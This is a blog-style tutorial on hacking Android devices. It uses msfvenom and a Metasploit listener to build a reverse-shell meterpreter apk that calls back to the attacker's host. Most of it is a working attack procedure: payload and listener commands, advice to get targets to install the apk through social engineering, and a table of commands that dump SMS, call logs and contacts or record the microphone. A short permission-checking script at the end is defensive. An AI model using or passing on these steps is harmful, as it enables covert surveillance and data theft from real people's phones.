Ever wanted to know how hacking Android devices works? This article walks through it.
We will use msfvenom to create a payload and save it as an apk file. After generating the payload, we need to set up a listener in the Metasploit Framework. Once the target downloads and installs the malicious apk, an attacker can easily get back a meterpreter session in Metasploit. An attacker needs to do some social engineering to get the apk installed on the victim’s mobile device.
Disclaimer: This tutorial is for educational purposes only. Please don’t try to hack anyone’s Android device without their permission.
Step 1) Fire up your Linux terminal (Ctrl + Alt + T)
Step 2) Now we need to open a Metasploit console because we’ll do most of our exploitation in that console. Just run this command in the terminal. You may need to enter your account password.
Step 3) It may take some time to load the console. Once it has loaded, we search for exploits for Android and check that they exist in the db. Run this command to list all available exploits for Android:
search type:exploit platform:android
Then you’ll see a list of all Android exploits available in the db. We’re going to use the exploit/multi/handler exploit.
Step 4) Run this command to set exploit
Step 5) Now we need a payload for the exploit (it is needed for retrieving data). You can search for Android payloads using search type:payload platform:android; we’re going to use payload/android/meterpreter/reverse_tcp as the payload.
Just run the command below:
set payload android/meterpreter/reverse_tcp
Step 6) Now we need to set LHOST (Local Host) to receive payload data in this console. We’ll need our local IP, which we’ll get using ifconfig.
Open a new terminal and run the command below to get the IP.
sudo ifconfig | grep inet
Find inet and you’ll see something like this. Note that IP address; we’ll need it.
Step 7) Back in msfconsole, run the command below to set our IP in LHOST:
set LHOST 192.168.1.210
Step 8) We also need a port to listen for data on. You can use any port, but keep it constant. We’ll use 4444.
set LPORT 4444
Step 9) Now we need to run the exploit, just fire below command in terminal
Here comes the part where we have to use social engineering in order to install the malware apk on the target Android device. But since we are testing this on our own device, we don’t have to use social engineering 😛
Step 10) Now we need to make a venomous apk using msfvenom, with the same configuration we used when setting up the exploit. Run the command below in a new terminal.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=4444 R > venomApp.apk
- -p indicates a payload type
- android/meterpreter/reverse_tcp specifies that a reverse meterpreter shell will come in from the target Android device
- LHOST is your local IP
- LPORT is the listening port
- R > would give the output directly on /home/kali
- venomApp.apk is the name of the final output file
Step 11) You’ll find the apk in your home folder; just copy it to your Android device.
Step 12) Now install it on your device (I am using an Android 9 device). After installing, open Main Activity.
Step 13) Now move back to the terminal; you’ll see something like in this image. Bingo, you successfully hacked into this Android device. Try running sysinfo to see device details.
Play with commands now
Use the help command to see all commands. Try exploring all of them. Here are some commands you can try.
| Command | Description |
|---|---|
| dump_sms | Get SMS messages |
| dump_calllog | Get call log |
| dump_contacts | Get contacts list |
| record_mic | Record audio from mic |
| screenshare | Start a screen record (may not work) |
| screenshot | Grab a screenshot (may not work) |
| app_run | Start an app |
| app_install | Request to install apk file |
Hope you liked this tutorial on hacking Android devices. Try not to do anything illegal. Please share this with your friends. A healthy tip to secure your Android device is to not install any application from an unknown source. If you really want to install one, try to read and examine its source code to get an idea of whether the file is malicious or not.
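One way to act on that tip before sideloading an apk is to check which permissions it requests. The script below is an added example, not part of the original tutorial: it parses text in the format printed by `aapt dump permissions` and flags an app that asks for several of the permissions behind the commands in the table above. The sample inputs, function names and review threshold are assumptions made for this illustration.

```python
import re

# Permissions an app must declare to do what the commands in the table
# above do (dump_sms, dump_calllog, dump_contacts, record_mic).
SENSITIVE = {
    "android.permission.READ_SMS": "read SMS messages",
    "android.permission.READ_CALL_LOG": "read the call log",
    "android.permission.READ_CONTACTS": "read the contacts list",
    "android.permission.RECORD_AUDIO": "record audio from the mic",
}

# Accepts both aapt output styles: name='a.b.C' and the older bare a.b.C.
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=')?([\w.]+)")


def parse_permissions(aapt_output):
    """Return the set of permission names found in `aapt dump permissions` text."""
    found = set()
    for line in aapt_output.splitlines():
        match = PERM_RE.match(line.strip())
        if match:
            found.add(match.group(1))
    return found


def triage(aapt_output, threshold=3):
    """Flag an apk for review when it requests `threshold` or more sensitive
    permissions. The threshold is an assumption of this example."""
    perms = parse_permissions(aapt_output)
    hits = {p: SENSITIVE[p] for p in sorted(perms) if p in SENSITIVE}
    return {"sensitive": hits, "review": len(hits) >= threshold}


# Constructed sample input: a "flashlight" app asking for far more than it needs.
SAMPLE_SUSPICIOUS = """package: com.example.flashlight
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: android.permission.RECORD_AUDIO
"""

# Constructed sample input: an app that only needs network access.
SAMPLE_BENIGN = """package: com.example.notes
uses-permission: name='android.permission.INTERNET'
"""

if __name__ == "__main__":
    for name, text in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, triage(text))
```

A flagged result is a prompt to look closer, not proof of malice: legitimate messaging or dialer apps request the same permissions, so compare the list against what the app claims to do.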
Happy Hacking Android.